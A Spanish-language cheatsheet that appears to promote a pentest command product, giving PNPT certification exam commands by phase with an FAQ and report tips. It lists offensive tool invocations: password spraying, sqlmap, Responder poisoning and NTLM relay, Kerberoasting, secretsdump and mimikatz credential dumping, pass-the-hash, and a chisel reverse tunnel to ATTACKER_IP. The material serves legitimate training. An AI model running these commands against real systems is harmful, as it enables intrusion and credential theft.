# OSINT y Recon externo
El PNPT empieza donde empieza un engagement real: el reconocimiento externo. Enumera empleados, correos y servicios expuestos para construir tu punto de entrada inicial.
theHarvester -d TARGET.com -b all
subfinder -d TARGET.com -silent | httpx -silent -title -tech-detect
curl -s 'https://crt.sh/?q=%.TARGET.com&output=json' | jq -r '.[].name_value' | sort -u
nmap -p- --min-rate=1000 -T4 TARGET -oN ext_ports.txt
# Acceso externo
Convierte el OSINT en un punto de entrada: password spraying contra portales expuestos, explotación web y reutilización de credenciales.
netexec smb TARGET -u users.txt -p 'Temporada2026!' --continue-on-success
ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc all -fc 404
sqlmap -r request.txt --batch --level 5 --risk 3 --dbs
# Active Directory
Una vez dentro, Active Directory es el corazón del PNPT. Envenena, relaya, roast y muévete lateralmente hasta Domain Admin.
responder -I eth0 -dwv
impacket-ntlmrelayx -tf targets.txt -smb2support
bloodhound-python -d domain.local -u USER -p PASS -c All -ns DC_IP
impacket-GetUserSPNs domain.local/USER:PASS -dc-ip DC_IP -request
impacket-secretsdump domain.local/ADMIN:PASS@DC_IP
evil-winrm -i TARGET -u USER -H NTLM_HASH
# Pivoting y Tunneling
El PNPT va de externo a interno. Pivota desde tu punto de entrada externo hacia la LAN corporativa.
./proxy -selfcert # ligolo-ng en Kali, luego añade la ruta del túnel
./chisel server -p 8080 --reverse # cliente: ./chisel client ATTACKER_IP:8080 R:socks
proxychains4 netexec smb 10.10.0.0/24
# Post-Explotación
Obtén credenciales, vuelca secretos y demuestra el impacto una vez que controlas los hosts.
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
whoami /priv # busca SeImpersonate → GodPotato para SYSTEM
netexec smb 10.10.0.0/24 -u ADMIN -H NTLM_HASH --shares
# Informe y Debrief
El PNPT no termina en Domain Admin. Debes entregar un informe profesional Y defenderlo en un debrief en vivo de 15 minutos.
# Resumen ejecutivo → Relato de ataque (ruta a DA) → Resumen compromiso AD → Hallazgos → Recomendaciones
# Prep del debrief: diagrama de la ruta de ataque + 1 frase «por qué» por paso + remediación
# Consejos del Examen PNPT
Estrategia para los 5 días de examen, el informe y el debrief en vivo.
❓ Preguntas frecuentes PNPT
El PNPT de TCM Security es un examen práctico de 5 días contra una red Active Directory realista, seguido de 2 días para redactar un informe profesional, y un debrief en vivo obligatorio de 15 minutos donde presentas tus hallazgos a un evaluador de TCM. Debes comprometer el dominio Y defender tu metodología.
El debrief es una videollamada en vivo de 15 minutos con un evaluador de TCM tras entregar tu informe. Recorres tu ruta de ataque y respondes preguntas. Evalúa la comprensión, no solo la ejecución — debes explicar POR QUÉ funcionó cada paso.
El PNPT suele verse como más accesible y realista: fuerte componente externo-a-interno y OSINT, gran enfoque en Active Directory, sin buffer overflow, y un debrief en vivo. La OSCP tiene máquinas independientes y una ventana más corta de 23h45. Ambos son respetados; el PNPT enfatiza un flujo de trabajo de engagement real.
theHarvester y herramientas OSINT, nmap, Responder y ntlmrelayx, BloodHound, impacket (GetUserSPNs, secretsdump, psexec), NetExec/CrackMapExec, evil-winrm, mimikatz, y ligolo-ng o chisel para el pivoting. El informe se redacta como un engagement de cliente real.
Sí — es el núcleo del examen. Tras el punto de entrada externo, pivotas internamente y atacas AD: envenenamiento LLMNR/NBT-NS (Responder), NTLM relay, Kerberoasting, pass-the-hash, token impersonation y movimiento lateral hasta Domain Admin.
Muy importante. A diferencia de la mayoría de los exámenes, el PNPT empieza con una fase de OSINT externo — enumerando empleados, correos y servicios expuestos para construir un punto de entrada (por ejemplo un password spray contra un portal expuesto). El OSINT alimenta directamente el acceso inicial.
No. El PNPT no incluye explotación manual de buffer overflow. Se centra en OSINT, acceso externo, Active Directory, pivoting e informe — un flujo de trabajo realista de test de intrusión de red interna.
Sí. El voucher del PNPT incluye un reintento gratuito, y el modelo de TCM Security está pensado para ser accesible. Consulta la política actual de TCM Security para los detalles exactos antes de programar.
Un informe profesional tipo cliente: resumen ejecutivo, alcance, relato de ataque (ruta hacia Domain Admin), hallazgos técnicos con severidad y remediación, y recomendaciones estratégicas. Debe ser lo bastante claro para presentarlo en vivo durante el debrief de 15 minutos.
Sí — como acelerador de preparación. El mapa mental gratuito organiza 12.020+ comandos por los dominios del PNPT (OSINT, AD, pivoting), el Espacio Pentest incluye una plantilla de informe PNPT dedicada con un resumen de compromiso de AD, y el AI Wizard genera un informe estilo PNPT. Respeta siempre las reglas de tu examen.
📚 Recursos relacionados
- Cheatsheet Active Directory — De Responder a Domain Admin — el núcleo de la fase interna del PNPT
- Cheatsheet CPTS — El equivalente de pentest empresarial de HTB
- Cheatsheet OSCP — El equivalente de OffSec — 150+ comandos de examen
- Cheatsheet Nmap — Referencia nmap completa para escaneo externo e interno
- Guía del informe de pentest — Estructura y plantilla de un informe que puedas defender en el debrief
- Cheatsheet Pentesting completa — 200+ comandos para web, red, Active Directory y privesc
Convierte tus hallazgos en un informe PNPT con un resumen de compromiso de AD — el AI Wizard tiene un formato PNPT dedicado listo para tu debrief.
Prepara tu PNPT con 12.020+ comandos
Esta cheatsheet es solo la superficie. Pentest Mindmap organiza 12.020+ comandos en 34 categorías con búsqueda instantánea, una plantilla de informe PNPT y un generador de informes con IA.
Empezar gratis →